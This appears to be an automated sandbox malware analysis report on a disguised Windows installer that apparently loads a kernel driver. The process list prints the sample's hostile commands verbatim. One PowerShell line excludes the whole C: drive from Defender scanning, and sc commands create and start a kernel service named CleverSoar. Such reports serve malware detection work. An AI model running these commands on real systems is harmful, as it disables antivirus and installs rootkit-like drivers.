  • http://www.metalinker.org/basic_string::_M_construct
  • https://aria2.github.io/
  • https://aria2.github.io/Usage:
  • https://github.com/aria2/aria2/issues
  • https://github.com/aria2/aria2/issuesReport
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe; String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2066138052.0000000002DC0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2066627306.000000007F7BB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000000.2069328889.0000000000AF1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000007.00000000.2162499297.0000000000FFD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.dr, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.6.dr; Strings found in binary or memory (Inno Setup runtime strings; the is-*.tmp naming and the /SL5= switch in the process tree are Inno Setup conventions):
  • https://www.innosetup.com/
  • https://www.remobjects.com/ps

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp; Process information set: 01 00 00 00 (ProcessBreakOnTermination = 1: the process marks itself critical, so terminating it bugchecks the machine with CRITICAL_PROCESS_DIED; this is the "Protects its processes via BreakOnTermination flag" signature above)

System Summary

barindex
Source: update.vac.2.dr | Static PE information: section name: .=~
Source: update.vac.7.dr | Static PE information: section name: .=~
Source: hrsw.vbc.7.dr | Static PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Code function: 7_2_6BF43886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Code function: 7_2_6C0C5120 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Code function: 7_2_6C0C5D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Code function: 7_2_6BF43A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Code function: 7_2_6BF439CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Code function: 7_2_6BF43D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Code function: 7_2_6BF43D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Code function: 7_2_6BF43C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Code function: 7_2_6BF41950 CreateFileA,DeviceIoControl,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Code function: 7_2_6BF44754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Code function (73 functions, no API names resolved):
    7_2_6BF54A27, 7_2_6BF44754, 7_2_6C0C1880, 7_2_6C0C6A43, 7_2_6C126CE0, 7_2_6C176D10, 7_2_6C194DE0, 7_2_6C0F8EA1,
    7_2_6C112EC9, 7_2_6C17EEF0, 7_2_6C14AEEF, 7_2_6C16E810, 7_2_6C186820, 7_2_6C194870, 7_2_6C144896, 7_2_6C18C8D0,
    7_2_6C19A91A, 7_2_6C176900, 7_2_6C18A930, 7_2_6C188950, 7_2_6C0F8972, 7_2_6C196999, 7_2_6C19AA00, 7_2_6C150A52,
    7_2_6C184AA0, 7_2_6C110B66, 7_2_6C16AB90, 7_2_6C18EBC0, 7_2_6C100BCA, 7_2_6C184489, 7_2_6C1584AC, 7_2_6C17E4D0,
    7_2_6C162521, 7_2_6C188520, 7_2_6C17C580, 7_2_6C172580, 7_2_6C1745D0, 7_2_6C18E600, 7_2_6C1946C0, 7_2_6C1867A0,
    7_2_6C0FC7CF, 7_2_6C1967C0, 7_2_6C15C7F3, 7_2_6C170020, 7_2_6C17E0E0, 7_2_6C188200, 7_2_6C18C2A0, 7_2_6C173D50,
    7_2_6C147D43, 7_2_6C195D90, 7_2_6C179E80, 7_2_6C151F11, 7_2_6C16589F, 7_2_6C1878C8, 7_2_6C1799F0, 7_2_6C16FA50,
    7_2_6C171AA0, 7_2_6C16DAD0, 7_2_6C11540A, 7_2_6C17F5C0, 7_2_6C13F5EC, 7_2_6C16B650, 7_2_6C18F640, 7_2_6C1796E0,
    7_2_6C199700, 7_2_6C1937C0, 7_2_6C17F050, 7_2_6C113092, 7_2_6C1771F0, 7_2_6C17D280, 7_2_6C17D380, 7_2_6C186AF0,
    7_2_6C183750
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function (69 functions, no API names resolved):
    11_2_005A81EC, 11_2_005E81C0, 11_2_005D4250, 11_2_005F8240, 11_2_005FC3C0, 11_2_005F04C8, 11_2_005D8650, 11_2_005DC950,
    11_2_005B0943, 11_2_005D8C20, 11_2_005F0E00, 11_2_005F4EA0, 11_2_005ED089, 11_2_005C10AC, 11_2_005F1120, 11_2_005DD1D0,
    11_2_005F91C0, 11_2_005E5180, 11_2_005FD2C0, 11_2_005653CF, 11_2_005C53F3, 11_2_005FD470, 11_2_005F54D0, 11_2_005AD496,
    11_2_005F1550, 11_2_00561572, 11_2_005B9652, 11_2_005ED6A0, 11_2_00579766, 11_2_005697CA, 11_2_005FD9E0, 11_2_00561AA1,
    11_2_005E5E80, 11_2_005E5F80, 11_2_0057E00A, 11_2_005E22E0, 11_2_00602300, 11_2_005CE49F, 11_2_005E25F0, 11_2_005D66D0,
    11_2_005DA6A0, 11_2_005FE990, 11_2_005E2A80, 11_2_005BAB11, 11_2_005E6CE0, 11_2_005E70D0, 11_2_005CB121, 11_2_005DB180,
    11_2_005F7200, 11_2_005FF3C0, 11_2_0058B3E4, 11_2_005EF3A0, 11_2_005D7410, 11_2_005EF420, 11_2_005DF500, 11_2_005F3530,
    11_2_0060351A, 11_2_005FF599, 11_2_00603601, 11_2_005F77C0, 11_2_005D3790, 11_2_0058F8E0, 11_2_005DF910, 11_2_0057BAC9,
    11_2_005E7AF0, 11_2_005B3AEF, 11_2_005E7C50, 11_2_0057BC92, 11_2_005DFDF0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process token adjusted: Security
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00561E40 appears 172 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 005628E3 appears 34 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 005FFB10 appears 723 times
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Code function: String function: 6C196F10 appears 728 times
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Code function: String function: 6C0F9240 appears 53 times
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.6.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.6.dr | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.dr | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2066627306.000000007FABA000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.6.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2066138052.0000000002EDE000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.6.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000000.2064220108.0000000000629000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.6.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe | Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.6.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.13.dr | Binary string: \Device\TfSysMon
Source: tProtect.dll.13.dr | Binary string: \Device\TfKbMonPWLCache
Source: classification engine | Classification label: mal84.evad.winEXE@138/32@0/0
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Code function: 7_2_6C0C5D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00569313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00573D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00569252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Code function: 7_2_6C0C5240 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | File created: C:\Program Files (x86)\Windows NT\is-DDM97.tmp
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2020:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4320:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5632:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6536:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1020:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2408:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3292:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5332:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5456:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5596:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7120:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5324:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6460:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6332:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4308:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5760:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6396:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6528:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6640:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1476:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1988:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2284:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2508:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2072:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2452:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7092:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5996:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6628:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6520:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1628:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2780:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe | File created: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.drBinary or memory string: SELECT data FROM %Q.'%q_node' WHERE nodeno=?Node %lld missing from databaseNode %lld is too small (%d bytes)Rtree depth out of range (%d)Node %lld is too small for cell count of %d (%d bytes)Dimension %d of cell %d on node %lld is corruptDimension %d of cell %d on node %lld is corrupt relative to parentwrong number of arguments to function rtreecheck()SELECT * FROM %Q.'%q_rowid'Schema corrupt or not an rtree_rowid_parentENDSELECT count(*) FROM %Q.'%q_%s'cannot open value of type %sno such rowid: %lldforeign keyindexedcannot open virtual table: %scannot open table without rowid: %scannot open view: %sno such column: "%s"cannot open %s column for writingblockDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';version%s_nodedata_shape does not contain a valid polygon
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.dr | Binary or memory string: SELECT %s WHERE rowid = ?SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %sinvalid rootpageorphan indexsqlite_stat%dDELETE FROM %Q.%s WHERE %s=%QDELETE FROM %Q.sqlite_master WHERE name=%Q AND type='trigger'corrupt schemaUPDATE %Q.sqlite_master SET rootpage=%d WHERE #%d AND rootpage=#%dstattable %s may not be droppeduse DROP TABLE to delete table %suse DROP VIEW to delete view %stblDELETE FROM %Q.sqlite_sequence WHERE name=%QDELETE FROM %Q.sqlite_master WHERE tbl_name=%Q and type!='trigger' UNIQUEindexcannot create a TEMP index on non-TEMP table "%s"table %s may not be indexedviews may not be indexedvirtual tables may not be indexedthere is already a table named %sindex %s already existssqlite_autoindex_%s_%dexpressions prohibited in PRIMARY KEY and UNIQUE constraintsconflicting ON CONFLICT clauses specifiedCREATE%s INDEX %.*sINSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);name='%q' AND type='index'table "%s" has more than one primary keyAUTOINCREMENT is only allowed on an INTEGER PRIMARY KEYTABLEVIEW
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2159459054.0000000003F69000.00000004.00001000.00020000.00000000.sdmp, is-8UMQQ.tmp.7.dr | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe | Virustotal: Detection: 6%
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe | String found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe | File read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe
Source: unknown | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe | Process created: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp "C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$20420,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe"
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\is-QEIHJ.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe | Process created: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp "C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$3043C,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENT
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-3K96V.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
